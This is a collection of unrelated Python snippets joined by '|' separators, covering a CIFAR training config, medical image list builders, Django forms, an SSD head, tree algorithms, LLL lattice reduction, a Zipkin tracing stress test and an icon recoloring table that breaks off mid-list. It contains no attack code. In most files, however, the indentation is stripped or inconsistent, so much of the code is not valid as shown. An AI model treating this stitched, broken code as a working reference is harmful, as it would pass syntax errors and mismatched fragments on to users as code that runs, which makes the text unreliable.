from pipeline.datasets.base import DatasetWithPostprocessingFunc, DatasetComposer, OneHotTargetsDataset
from pipeline.datasets.mixup import MixUpDatasetWrapper
from pipeline.losses.vector_cross_entropy import VectorCrossEntropy
from pipeline.metrics.accuracy import MetricsCalculatorAccuracy
from pipeline.schedulers.learning_rate.reduce_on_plateau import SchedulerWrapperLossOnPlateau
from pipeline.trainers.classification import TrainerClassification
TRAIN_DATASET_PATH = "~/.pipeline/cifar/train"
TEST_DATASET_PATH = "~/.pipeline/cifar/test"
def get_dataset(path, transforms, train, use_mixup):
images_dataset = DatasetWithPostprocessingFunc(
CIFARImagesDataset(path=path, train=train, download=True),
transforms)
targets_dataset = CIFARTargetsDataset(path=path, train=train)
if use_mixup:
targets_dataset = OneHotTargetsDataset(targets_dataset, 10)
return DatasetComposer([images_dataset, targets_dataset])
class ConfigCIFARBase(ConfigBase):
def __init__(self, model, model_save_path, num_workers=8, batch_size=128, transforms=None,
epoch_count=200, print_frequency=10, mixup_alpha=0):
optimizer = optim.SGD(
model.parameters(),
lr=0.1,
momentum=0.9,
weight_decay=5e-4)
scheduler = SchedulerWrapperLossOnPlateau(optimizer)
loss = nn.CrossEntropyLoss()
metrics_calculator = MetricsCalculatorAccuracy()
trainer_cls = TrainerClassification
if transforms is None:
transforms = ToTensor()
train_dataset = get_dataset(path=TRAIN_DATASET_PATH, transforms=transforms, train=True,
use_mixup=mixup_alpha > 0)
val_dataset = get_dataset(path=TEST_DATASET_PATH, transforms=transforms, train=False,
use_mixup=mixup_alpha > 0)
if mixup_alpha > 0:
train_dataset = MixUpDatasetWrapper(train_dataset, alpha=mixup_alpha)
loss = VectorCrossEntropy()
super().__init__(
model=model,
model_save_path=model_save_path,
optimizer=optimizer,
scheduler=scheduler,
loss=loss,
metrics_calculator=metrics_calculator,
batch_size=batch_size,
num_workers=num_workers,
train_dataset=train_dataset,
val_dataset=val_dataset,
trainer_cls=trainer_cls,
print_frequency=print_frequency,
epoch_count=epoch_count,
device="cpu")
|
from .allreduce import allreduce_tree
from .broadcast import broadcast_one_to_all, broadcast_ring, broadcast_spreading
from .neighbor_allreduce import neighbor_allreduce
|
from __future__ import division, print_function
import os
import click
desikan_label_ids = {
"left_thalamus": 10,
"right_thalamus": 49,
"left_caudate": 11,
"right_caudate": 50,
"left_putamen": 12,
"right_putamen": 51,
"left_pallidum": 13,
"right_pallidum": 52,
"left_hippocampus": 17,
"right_hippocampus": 53,
"left_amygdala": 18,
"right_amygdala": 54,
}
@click.command()
@click.argument("health", nargs=1, type=click.Path(exists=True))
def main(health):
    for region_name, label_id in desikan_label_ids.items():
folder = "../data/lists/{0}".format(region_name)
try:
os.makedirs(folder)
        except OSError:
pass
output0_name = folder + "/list0.txt"
output1_name = output0_name.replace("0", "1")
output0_file = open(output0_name, "w")
output1_file = open(output1_name, "w")
with open(health, "r") as health_file:
for i, line in enumerate(health_file):
health_status = int(line)
output_line = "/tenochtitlan/data/fsl/train_{0}_cropped/train_{0}_cropped_{1}.nrrd".format(
i + 1, region_name)
if health_status == 0:
output0_file.write(output_line)
output0_file.write("\n")
                else:
                    output1_file.write(output_line)
                    output1_file.write("\n")
        output0_file.close()
        output1_file.close()
if __name__ == "__main__":
main()
|
import pandas as pd
import os
import sys
from typing import List
from utilies import merge_features
def make_merged_data(
    raw_path: str, processed_path: str, data: str, build_files: bool = True
) -> pd.DataFrame:
if data not in ['train', 'test']:
        raise ValueError("Argument 'data' must be one of 'train', 'test'")
features = pd.read_csv(
os.path.join(raw_path, 'dengue_features_' + data + '.csv')
)
features = merge_features(features)
    features = features.drop(
        ['year', 'weekofyear', 'reanalysis_specific_humidity_g_per_kg'],
        axis=1
    )
if build_files:
features.to_csv(
os.path.join(processed_path, 'merged_features_' + data + '.csv'),
index = False
)
return features
if __name__ == "__main__":
if len(sys.argv) != 3:
raise ValueError(
'Usage: python build_merged_features.py <raw data path> <processed data path>'
)
make_merged_data(sys.argv[1], sys.argv[2], data = 'train')
make_merged_data(sys.argv[1], sys.argv[2], data = 'test') |
from django import forms
from django.forms.models import inlineformset_factory
from .models import Choice, Question
class QuestionForm(forms.ModelForm):
class Meta:
model = Question
fields = ('text', )
ChoiceFormSet = inlineformset_factory(
parent_model=Question, model=Choice, form=QuestionForm,
extra=2, max_num=10, can_delete=False
)
|
from azure_lightning_flask.application import create_app
def main():
app = create_app()
app.run()
if __name__ == "__main__":
main() |
from shortcuts.actions.base import BaseAction, FloatField
class NumberAction(BaseAction):
itype = 'is.workflow.actions.number'
keyword = 'number'
number = FloatField('WFNumberActionNumber')
|
from rest_framework import serializers, pagination
from .models import Catalog, Element
class CatalogSerializer(serializers.ModelSerializer):
"""This class is used to manage how we pass Catalog to the client app."""
class Meta:
model = Catalog
fields = '__all__'
class ElementSerializer(serializers.ModelSerializer):
"""This class is used to manage how we pass Element to the client app."""
class Meta:
model = Element
fields = '__all__'
|
"""Content discriminator for DRIT"""
from torch.nn import Conv2d, Sequential, InstanceNorm2d, Identity, \
ReflectionPad2d, LeakyReLU
from ..base_module import BaseModule
from ..blocks import ConvBlock
class ContentDiscriminator(BaseModule):
"""Content discriminator"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.layers = Sequential(
*[ConvBlock(
256, 256, kernel=7, stride=2, padding_module=ReflectionPad2d,
norm=InstanceNorm2d, non_linear=LeakyReLU) for _ in range(3)],
ConvBlock(256, 256, kernel=4, stride=1, padding=0, norm=Identity),
Conv2d(256, kwargs.get("nb_domains", 3), kernel_size=1,
stride=1, padding=0)
)
def forward(self, input_):
class_prediction = super().forward(input_)
return class_prediction.view(
class_prediction.size(0), class_prediction.size(1))
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class SSDHead(nn.Module):
def __init__(self,
num_classes=81,
in_channels=[256,256,256,256,256],
aspect_ratios=([2], [2, 3], [2, 3], [2, 3], [2], [2])):
super(SSDHead, self).__init__()
self.num_classes = num_classes
self.in_channels = in_channels
num_anchors = [len(ratios) * 2 + 2 for ratios in aspect_ratios]
reg_convs = []
cls_convs = []
for i in range(len(in_channels)):
reg_convs.append(
nn.Conv2d(
in_channels[i],
num_anchors[i] * 4,
kernel_size=3,
padding=1))
cls_convs.append(
nn.Conv2d(
in_channels[i],
num_anchors[i] * num_classes,
kernel_size=3,
padding=1))
self.reg_convs = nn.ModuleList(reg_convs)
self.cls_convs = nn.ModuleList(cls_convs)
self.init_weights()
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
torch.nn.init.xavier_uniform_(m.weight)
def forward(self, feats):
cls_scores = []
bbox_preds = []
for feat, reg_conv, cls_conv in zip(feats, self.reg_convs,
self.cls_convs):
#[num_featuremap,w,h,c]
cls_scores.append(cls_conv(feat).permute(0, 2, 3, 1).contiguous())
bbox_preds.append(reg_conv(feat).permute(0, 2, 3, 1).contiguous())
return cls_scores, bbox_preds |
import os
def include_code(filename, lines="", mark_disjoint="", language="",
start_with=None, end_before=None):
# Note: this filter hackily assumes content/ since I don't want to figure
# out how to actually pull values from the Dactyl config file from this
# point in the code.
with open("content/"+filename, encoding="utf-8") as f:
s = f.read()
# Set the default marker for skipped lines if a custom one isn't provided
if mark_disjoint == True:
mark_disjoint = "..."
# Truncate everything before the specified starting point (start_with)
if start_with is not None:
start_i = s.find(start_with)
if start_i == -1:
raise ValueError("include_code: couldn't find start_with point '%s'"%start_with)
s = s[start_i:]
# Truncate everything after the specified ending point (end_before)
if end_before is not None:
end_i = s.find(end_before)
if end_i == -1:
raise ValueError("include_code: couldn't find end_before point '%s'"%end_before)
s = s[:end_i]
if lines:
use_lines = parse_range(lines)
s2 = ""
file_lines = s.split("\n")
old_i = None
for i in use_lines:
if i < 1 or i > len(file_lines):
raise ValueError("include_code: requested line is out of range: '%s'" % i)
if old_i != None and mark_disjoint:
if old_i+1 != i:
s2 += mark_disjoint + "\n"
s2 += file_lines[i-1] + "\n"
old_i = i
s = s2
return "```%s\n%s\n```" % (language, s.strip())
def parse_range(range_string):
range_list = []
for x in range_string.split(","):
part = x.split("-")
if len(part) == 1:
range_list.append(int(part[0]))
elif len(part) == 2:
range_list += [i for i in range(int(part[0]), int(part[1])+1)]
else:
raise ValueError("invalid range: '%s'" % range_string)
return range_list
export = {
"include_code": include_code
}
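# Quick sanity check for parse_range (not part of the Dactyl filter API);
# it runs only when this module is executed directly.
if __name__ == "__main__":
    assert parse_range("1-3,7") == [1, 2, 3, 7]
    assert parse_range("5") == [5]
    print("parse_range examples OK")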
|
from neo.Core.TX.Transaction import Transaction, TransactionType
from neocore.Cryptography.ECCurve import ECDSA
class EnrollmentTransaction(Transaction):
PublicKey = None
_script_hash = None
def __init__(self, *args, **kwargs):
"""
Create an instance.
Args:
*args:
**kwargs:
"""
super(EnrollmentTransaction, self).__init__(*args, **kwargs)
self.Type = TransactionType.EnrollmentTransaction
def Size(self):
"""
Get the total size in bytes of the object.
Returns:
int: size.
"""
return super(EnrollmentTransaction, self).Size() + self.PublicKey.Size()
def DeserializeExclusiveData(self, reader):
"""
Deserialize full object.
Args:
reader (neo.IO.BinaryReader):
Raises:
Exception: If the version read is incorrect.
"""
        if self.Version != 0:
raise Exception('Invalid format')
self.PublicKey = ECDSA.Deserialize_Secp256r1(reader)
def SerializeExclusiveData(self, writer):
"""
Serialize object.
Args:
writer (neo.IO.BinaryWriter):
"""
self.PublicKey.Serialize(writer, True)
def ToJson(self):
"""
Convert object members to a dictionary that can be parsed as JSON.
Returns:
dict:
"""
jsn = super(EnrollmentTransaction, self).ToJson()
jsn['pubkey'] = self.PublicKey.ToString()
return jsn
|
from mapping.tridiag.get_tridiag_solver import get_tridiag, get_tridiag_from_diag, get_tridiag_from_special_sparse
|
import sys
sys.path.append("..") # to import higher directory.
from Queues.queue import Queue
class Node(object):
def __init__(self, value):
self.info = value
self.left = None
self.right = None
class BinaryTree(object):
def __init__(self, root):
self.root = Node(root)
def top_view(self, root):
if root is None:
return
# make an empty queue for BFS
que = Queue()
# empty set
        sets = set()
# list to store top view keys
topview = list()
# append root in the queue with horizontal distance as 0
que.enqueue((root, 0))
while que:
# get the element and horizontal distance
# will use popleft() if using deque.
node, hd = que.dequeue()
# if the hd is seen first time it will be top view
if hd not in sets:
topview.append((node.info, hd))
sets.add(hd)
# add left and right child in the queue with hd - 1 and hd + 1
if node.left is not None:
que.enqueue((node.left, hd - 1))
if node.right is not None:
que.enqueue((node.right, hd + 1))
for i in topview:
print(i[0], end=' ')
def bottom_view(self, root):
if root is None:
return
# make an empty queue for BFS
que = Queue()
# dict to store bottom view keys
# not set as for bottom view we are
        # updating/replacing the values at same horizontal distance
bottomview = dict()
# append root in the queue with horizontal distance as 0
que.enqueue((root, 0))
while que:
# get the element and horizontal distance
node, hd = que.dequeue()
# update the last seen hd element
bottomview[hd] = node.info
# add left and right child in the queue with hd - 1 and hd + 1
if node.left is not None:
que.enqueue((node.left, hd - 1))
if node.right is not None:
que.enqueue((node.right, hd + 1))
for i in bottomview:
print(bottomview[i], end=' ')
tree = BinaryTree(1)
tree.root.left = Node(2)
tree.root.right = Node(3)
tree.root.left.left = Node(4)
tree.root.left.right = Node(5)
tree.top_view(tree.root)
tree.bottom_view(tree.root) |
import numpy as np
# generate artificial data
nr_of_bb = 4000
# minimal and maximal position and dimension of rectangles
min_xywh = [.0,.0,.2,.2]
max_xywh = [1.,1.,1.,1.]
# four lists of rectangles:
# - bbs1 and bbs2 are used to generate examples R(x,y) with x in bbs1 and y in bbs2;
# - bbs12 = bbs1 + bbs2
# - bbst is the set of rectangles for test
bbs1 = np.random.uniform(min_xywh,max_xywh, size=(nr_of_bb, 4))
bbs2 = np.random.uniform(min_xywh,max_xywh, size=(nr_of_bb, 4))
bbs12 = np.concatenate([bbs1,bbs2],axis=0)
bbst = np.random.uniform([0, 0, .2, .2], [1, 1, 1, 1], size=(nr_of_bb, 4))
# functions that compute training examples of relations between BBs
def angle(bb1,bb2):
c1 = bb1[:2] + .5*bb1[2:]
c2 = bb2[:2] + .5*bb2[2:]
x = c2 - c1
return np.angle(x[0] + 1j*x[1],deg=True)
def is_left(bb1,bb2):
return bb1[0] + bb1[2] < bb2[0] and np.abs(angle(bb1, bb2)) < 5
def is_not_left(bb1,bb2):
return bb1[0] + bb1[2] > bb2[0] or np.abs(angle(bb1, bb2)) > 45
def is_right(bb1, bb2):
return is_left(bb2,bb1)
def is_not_right(bb1,bb2):
return is_not_left(bb2,bb1)
def is_below(bb1, bb2):
return bb1[1] + bb1[3] < bb2[1] and np.abs(angle(bb1, bb2)-90) < 5
def is_not_below(bb1, bb2):
return bb1[1] + bb1[3] > bb2[1] or np.abs(angle(bb1, bb2)-90) > 45
def is_above(bb1, bb2):
return is_below(bb2,bb1)
def is_not_above(bb1,bb2):
return is_not_below(bb2,bb1)
def contains(bb1,bb2):
return bb1[0] < bb2[0] and bb1[0] + bb1[2] > bb2[0] + bb2[2] and \
bb1[1] < bb2[1] and bb1[1] + bb1[3] > bb2[1] + bb2[3]
def not_contains(bb1,bb2):
return not contains(bb1,bb2)
def is_in(bb1,bb2):
return contains(bb2,bb1)
def is_not_in(bb1,bb2):
return not is_in(bb1,bb2)
# pairs of rectangles for training
left_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_left(bbs1[i],bbs2[i])])
left_data = np.squeeze(left_data)
right_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_right(bbs1[i],bbs2[i])])
right_data = np.squeeze(right_data)
above_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_above(bbs1[i],bbs2[i])])
above_data = np.squeeze(above_data)
below_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_below(bbs1[i],bbs2[i])])
below_data = np.squeeze(below_data)
contain_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if contains(bbs1[i],bbs2[i])])
contain_data = np.squeeze(contain_data)
in_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_in(bbs1[i],bbs2[i])])
in_data = np.squeeze(in_data)
non_left_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_not_left(bbs1[i],bbs2[i])])
non_left_data = np.squeeze(non_left_data)
non_right_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_not_right(bbs1[i],bbs2[i])])
non_right_data = np.squeeze(non_right_data)
non_above_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_not_above(bbs1[i],bbs2[i])])
non_above_data = np.squeeze(non_above_data)
non_below_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_not_below(bbs1[i],bbs2[i])])
non_below_data = np.squeeze(non_below_data)
non_contain_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if not_contains(bbs1[i],bbs2[i])])
non_contain_data = np.squeeze(non_contain_data)
non_in_data = np.array([np.concatenate([bbs1[i],bbs2[i]],axis=0)
for i in range(nr_of_bb)
if is_not_in(bbs1[i],bbs2[i])])
non_in_data = np.squeeze(non_in_data)
def generate_rectangles(nr_rectangles,min_xywh = [.0,.0,.2,.2],max_xywh = [1.,1.,1.,1.]):
return np.random.uniform(min_xywh,max_xywh, size=(nr_rectangles, 4)).astype("float32")
def angle(bbs1,bbs2):
c1 = bbs1[:,:2] + .5*bbs1[:,2:]
c2 = bbs2[:,:2] + .5*bbs2[:,2:]
x = c2 - c1
return np.angle(x[:,0] + 1j*x[:,1],deg=True)
def is_left(bbs1,bbs2):
return np.logical_and(bbs1[:,0] + bbs1[:,2] < bbs2[:,0],np.abs(angle(bbs1, bbs2)) < 5.)
def is_not_left(bbs1,bbs2):
return np.logical_or(bbs1[:,0] + bbs1[:,2] > bbs2[:,0], np.abs(angle(bbs1, bbs2)) > 45)
def is_right(bbs1, bbs2):
return is_left(bbs2,bbs1)
def is_not_right(bbs1,bbs2):
return is_not_left(bbs2,bbs1)
def is_below(bbs1, bbs2):
return np.logical_and(bbs1[:,1] + bbs1[:,3] < bbs2[:,1],np.abs(angle(bbs1, bbs2)-90) < 5)
def is_not_below(bbs1, bbs2):
return np.logical_or(bbs1[:,1] + bbs1[:,3] > bbs2[:,1],np.abs(angle(bbs1, bbs2)-90) > 45)
def is_above(bbs1, bbs2):
return is_below(bbs2,bbs1)
def is_not_above(bbs1,bbs2):
return is_not_below(bbs2,bbs1)
def contains(bbs1,bbs2):
return np.all([bbs1[:,0] < bbs2[:,0],
bbs1[:,0] + bbs1[:,2] > bbs2[:,0] + bbs2[:,2],
bbs1[:,1] < bbs2[:,1],
bbs1[:,1] + bbs1[:,3] > bbs2[:,1] + bbs2[:,3]],axis=0)
def not_contains(bbs1,bbs2):
return np.logical_not(contains(bbs1,bbs2))
def is_in(bbs1,bbs2):
return contains(bbs2,bbs1)
def is_not_in(bbs1,bbs2):
return np.logical_not(is_in(bbs1,bbs2))
# generations of data for negative examples and generic rectangles used to feed the variables x,y,z
nr_random_bbs = 50
def get_data(type):
feed_dict = {}
feed_dict["?left_xy"] = left_data
feed_dict["?right_xy"] = right_data
feed_dict["?below_xy"] = below_data
feed_dict["?above_xy"] = above_data
feed_dict["?contains_xy"] = non_contain_data[np.random.choice(len(non_contain_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?contained_in_xy"] = non_in_data[np.random.choice(len(non_in_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?non_left_data"] = non_left_data[np.random.choice(len(non_left_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?not_left_xy"] = non_right_data[np.random.choice(len(non_right_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?not_below_xy"] = non_below_data[np.random.choice(len(non_below_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?not_above_xy"] = non_above_data[np.random.choice(len(non_above_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?not_contains_xy"] = non_contain_data[np.random.choice(len(non_contain_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?not_contained_in_xy"] = non_in_data[np.random.choice(len(non_in_data),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?x"] = bbs12[np.random.choice(len(bbs12),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?y"] = bbs12[np.random.choice(len(bbs12),nr_random_bbs,replace=True)].astype(np.float32)
feed_dict["?z"] = bbs12[np.random.choice(len(bbs12),nr_random_bbs,replace=True)].astype(np.float32)
return feed_dict
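# Minimal usage sketch of the vectorized relation predicates and get_data() above;
# the names pairs_a/pairs_b are illustrative only.
if __name__ == "__main__":
    pairs_a = generate_rectangles(5)
    pairs_b = generate_rectangles(5)
    # Each predicate returns a boolean vector, one entry per rectangle pair
    print("is_left:  ", is_left(pairs_a, pairs_b))
    print("is_above: ", is_above(pairs_a, pairs_b))
    print("contains: ", contains(pairs_a, pairs_b))
    # get_data() bundles sampled positive/negative pairs for the grounding variables
    batch = get_data("train")
    print("feed keys:", sorted(batch.keys()))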
|
filename='update.test'
with open(filename) as f:
conf=[]
for line in f:
line=line.strip().split(',')
conf.append(line)
def update_data(d='d'):
    # conf holds comma-split lines, so look for 'test' inside each line's fields
    if any('test' in line for line in conf):
        print('updated!!')
    else:
        print('notupdate')
|
from __future__ import division
from fractions import Fraction
from vector import Vector
import unittest
def gcd(a, b):
while b:
a, b = b, a%b
return a
class IntegerLattice:
def __init__(s, *args):
if len(args) == 1 and hasattr(args[0], '__iter__'):
s.basis = list(args[0])
else:
s.basis = list(args)
if not all(isinstance(v, Vector) for v in s.basis):
raise ValueError("A lattice basis must be a list of instance of Vector.")
if not all(len(v) == len(s.basis[0]) for v in s.basis):
raise ValueError("All lattice basis must have the same size.")
if not all(all(isinstance(x, int) for x in v) for v in s.basis):
raise ValueError("This class is only implemented a lattice over the Integer ring.")
# Initialize "gcd" vector
v = list(s.basis[0])
for x in s.basis[1:]:
x = list(x)
v = [gcd(a, b) for a, b in zip(x, v)]
s.gcd_vector = v
def __repr__(s):
ret = s.__class__.__name__
ret += '(' + ', '.join(map(repr, s.basis)) + ')'
return ret
def __eq__(s, other):
if isinstance(other, IntegerLattice):
return s.basis == other.basis
elif hasattr(other, '__iter__'):
return s.basis == list(other)
else:
return False
def __str__(s):
return 'Integer Lattice with {} basis [{}]'.format(len(s.basis), ', '.join(map(str, s.basis)))
def is_point(s, v):
return all(divmod(x, y)[1] == 0 for x, y in zip(v, s.gcd_vector))
def gram_schmidt_orthgonalization(L):
bc = (Fraction, int)
basis = [Vector(list(x), base_class=bc) for x in L.basis]
ret = [basis[0]]
for j in range(1, len(basis)):
t = Vector([0 for _ in basis], base_class=bc)
for i in range(j):
t = t.add(ret[i].scalar_mult(Fraction(basis[j].inner_product(ret[i]), ret[i].inner_product(ret[i]))))
ret += [basis[j].sub(t)]
return ret
def is_LLL_basis(L, delta=3/4):
n = len(L.basis)
m = len(L.basis[0])
gs_basis = gram_schmidt_orthgonalization(L)
for i in range(1, n):
bi = L.basis[i]
for j in range(i):
bj_star = gs_basis[j]
if abs(bi.inner_product(bj_star) / (bj_star.norm()**2)) > 1/2:
return False
for i in range(n - 1):
if delta * gs_basis[i].norm()**2 > gs_basis[i+1].norm()**2:
return False
return True
def LLL(L, delta=3/4):
import copy
import math
L = copy.deepcopy(L)
n = len(L.basis)
while True:
for i in range(n):
for _j in range(i):
bi = L.basis[i]
j = i - _j - 1
bj = L.basis[j]
cij = int(math.floor(bi.inner_product(bj) / bj.inner_product(bj) + 0.5))
L.basis[i] = bi.sub(bj.scalar_mult(cij))
gs_basis = gram_schmidt_orthgonalization(L)
return_flag = True
for i in range(n - 1):
if delta * gs_basis[i].norm()**2 > gs_basis[i + 1].norm()**2:
L.basis[i], L.basis[i + 1] = L.basis[i + 1], L.basis[i]
return_flag = False
break
if return_flag:
return L
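# Minimal usage sketch (assuming the Vector class in vector.py can be built from a
# plain list of ints, as the constructor calls above suggest); the basis is
# illustrative only.
if __name__ == "__main__":
    lat = IntegerLattice(Vector([1, 1, 1]), Vector([-1, 0, 2]), Vector([3, 5, 6]))
    print(lat)
    print(LLL(lat))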
|
"""
Synthetic example with high concurrency. Used primarily to stress test the
library.
"""
import argparse
import contextlib
import sys
import time
import threading
import random
# Comment out to test against the published copy
import os
sys.path.insert(1, os.path.dirname(os.path.realpath(__file__)) + '/../..')
import opentracing
import zipkin_ot
def sleep_dot():
"""Short sleep and writes a dot to the STDOUT.
"""
time.sleep(0.05)
sys.stdout.write('.')
sys.stdout.flush()
def add_spans():
"""Calls the opentracing API, doesn't use any OpenZipkin-specific code.
"""
with opentracing.tracer.start_span(operation_name='trivial/initial_request') as parent_span:
parent_span.set_tag('url', 'localhost')
parent_span.log_event('All good here!', payload={'N': 42, 'pi': 3.14, 'abc': 'xyz'})
parent_span.set_tag('span_type', 'parent')
parent_span.set_baggage_item('checked', 'baggage')
rng = random.SystemRandom()
for i in range(50):
time.sleep(rng.random() * 0.2)
sys.stdout.write('.')
sys.stdout.flush()
# This is how you would represent starting work locally.
with opentracing.start_child_span(parent_span, operation_name='trivial/child_request') as child_span:
child_span.log_event('Uh Oh!', payload={'error': True})
child_span.set_tag('span_type', 'child')
# Play with the propagation APIs... this is not IPC and thus not
# where they're intended to be used.
text_carrier = {}
opentracing.tracer.inject(child_span.context, opentracing.Format.TEXT_MAP, text_carrier)
span_context = opentracing.tracer.extract(opentracing.Format.TEXT_MAP, text_carrier)
with opentracing.tracer.start_span(
'nontrivial/remote_span',
child_of=span_context) as remote_span:
remote_span.log_event('Remote!')
remote_span.set_tag('span_type', 'remote')
time.sleep(rng.random() * 0.1)
opentracing.tracer.flush()
def zipkin_ot_tracer_from_args():
"""Initializes OpenZipkin from the commandline args.
"""
parser = argparse.ArgumentParser()
parser.add_argument('--host', help='The OpenZipkin reporting service host to contact.',
default='localhost')
parser.add_argument('--port', help='The OpenZipkin reporting service port.',
type=int, default=9411)
parser.add_argument('--service_name', help='The OpenZipkin component name',
default='TrivialExample')
args = parser.parse_args()
return zipkin_ot.Tracer(
service_name=args.service_name,
collector_host=args.host,
collector_port=args.port,
verbosity=1)
if __name__ == '__main__':
print('Hello, ')
# Use OpenZipkin's opentracing implementation
with zipkin_ot_tracer_from_args() as tracer:
opentracing.tracer = tracer
for j in range(20):
threads = []
for i in range(64):
t = threading.Thread(target=add_spans)
threads.append(t)
t.start()
for t in threads:
t.join()
print('\n')
print(' World!')
|
"""
3,猴子吃桃问题:猴子第一天摘下若干个桃子,当即吃了一半,还不瘾,又多吃了一个。第二天早上又将剩下的桃子吃掉一半,又多吃了一个。
以后每天早上都吃了前一天剩下的一半零一个。到第10天早上想再吃时,见只剩下一个桃子了。求第一天共摘了多少。
"""
def find_x(day):
x = 3*(2**(day-1))-2
return x
print(find_x(10))
# a10=1
# a9=(a10+1)*2
# a8=(a9+1)*2
# ....
# Mathematical approach: how a person would normally reason about it
# res = 1
# for i in range(9):
# res += 1
# res *= 2
# print(res)
# The computer's approach (brute force)
res01 = 1
while True:
res = res01
for i in range(9):
res /= 2
res -= 1
if res == 1:
print(res01)
break
res01 += 1
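# Quick consistency check (illustrative): the closed form above and the
# brute-force search arrive at the same answer.
assert find_x(10) == res01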
|
from __future__ import annotations
from collections import deque
from dataclasses import dataclass
from types import SimpleNamespace
from typing import Deque, Optional
@dataclass
class Node:
data: int
left: Optional[Node] = None
right: Optional[Node] = None
def left_tree_value_bfs(root: Node):
result: Node = None
queue: Deque = deque()
queue.append(root)
left_most: Node = None
while len(queue) > 0:
level_len: int = len(queue)
left_most: Node = None
for children in range(level_len):
node: Node = queue.popleft()
if node.left:
queue.append(node.left)
if not left_most:
left_most = node.left
result = left_most
if node.right:
queue.append(node.right)
print(result)
def is_tree_height_balance(source: Node):
result = SimpleNamespace(is_balance=True)
def helper(source: Node):
if not source.left and not source.right:
return 0
left_height, right_height = 0, 0
if source.left:
left_height = helper(source.left) + 1
        if source.right:
            right_height = helper(source.right) + 1
        if result.is_balance and abs(left_height - right_height) not in {0, 1}:
            print(f"Tree is unbalanced at: {source}, {left_height} {right_height}")
result.is_balance = False
return max(left_height, right_height)
helper(source)
print(result)
# LeetCode Problem: 563
def binary_tree_tilt(root: Node):
    if not root.left and not root.right:
        return 0
    tilt = 0
    if root.left:
        tilt += binary_tree_tilt(root.left)
    if root.right:
        tilt += binary_tree_tilt(root.right)
    left_value = root.left.data if root.left else 0
    right_value = root.right.data if root.right else 0
    tilt += abs(left_value - right_value)
    return tilt
root: Node = Node(2)
root.left = Node(1)
root.right = Node(3)
left_tree_value_bfs(root)
root = Node(1)
root.left = Node(2)
root.left.left = Node(4)
root.right = Node(3)
root.right.left = Node(5)
root.right.left.left = Node(7)
root.right.right = Node(6)
left_tree_value_bfs(root)
root = Node(3)
root.left = Node(9)
root.right = Node(20)
root.right.right = Node(7)
root.right.left = Node(15)
is_tree_height_balance(root)
root = Node(1)
root.left = Node(2)
root.right = Node(2)
root.left.right = Node(3)
root.left.left = Node(3)
root.left.left.right = Node(4)
root.left.left.left = Node(4)
is_tree_height_balance(root)
root: Node = Node(1)
root.left = Node(2)
root.right = Node(3)
print(f"Tilt Value of Tree: {binary_tree_tilt(root)}")
|
"""
Batch process Windows 10 and 7/8 icon file colorings
Python 3.x
"""
import io
import os
import sys
import struct
import statistics
from pprint import pprint
from colorsys import rgb_to_hls, hls_to_rgb
from PIL import Image # pip3 install pillow
"""
Windows10.ico:
Values: 25,559
Hue Avg: 45.228, Median: 45.149, Mode: 44.776, Stdev: 0.582, Min: 43.235, Max: 46.567
Sat Avg: 74.136, Median: 73.333, Mode: 82.353, Stdev: 5.108, Min: 64.510, Max: 87.255
Lum Avg: 92.817, Median: 94.161, Mode: 100.000, Stdev: 6.975, Min: 74.444, Max: 100.000
Windows7_8_no_label.ico:
Values: 31,355
Hue Avg: 48.765, Median: 48.358, Mode: 53.924, Stdev: 2.748, Min: 41.351, Max: 55.714
Sat Avg: 71.403, Median: 72.157, Mode: 84.510, Stdev: 10.190, Min: 30.392, Max: 97.843
Lum Avg: 76.613, Median: 79.661, Mode: 100.000, Stdev: 17.735, Min: 31.034, Max: 100.000
Google Material Design (GMD) color palette:
https://material-ui.com/customization/color/
With the base Win10 SL its between the 200 and 300 shade
"""
base_path = '../Controller/Resources/'
# Windows 10 color set tweak table
win10_hue = -45.228 # Hue offset
win10_table = [
# Output file name HUE (0-360) Sat Level scalar
["Win10set/Black.ico", win10_hue + 50.0, 0.0, 0.35], # grey 800 hsl(0, 0%, 26%)
["Win10set/Blue gray.ico", win10_hue + 200.0, 0.195, 0.73], # blueGrey 400 hsl(200, 15%, 54%)
["Win10set/Blue.ico", win10_hue + 207.0, 0.99, 0.92], # blue 400 hsl(207, 89%, 68%)
["Win10set/Brown.ico", win10_hue + 16.0, 0.215, 0.64], # brown 400 hsl(16, 18%, 47%)
["Win10set/Cyan.ico", win10_hue + 187, 0.79, 0.8], # cyan 300 hsl(187, 71%, 59%)
["Win10set/Gray.ico", win10_hue + 50.0, 0.0, 1.1], # grey 300 hsl(0, 0%, 88%)
["Win10set/Green.ico", win10_hue + 123.0, 0.45, 0.77], # green 400 hsl(123, 38%, 57%)
["Win10set/Lime.ico", win10_hue + 66.0, 0.78, 0.80], # lime 400 hsl(66, 70%, 61%)
["Win10set/Orange.ico", win10_hue + 36.0, 1.5, 0.86], # orange 300 hsl(36, 100%, 65%)
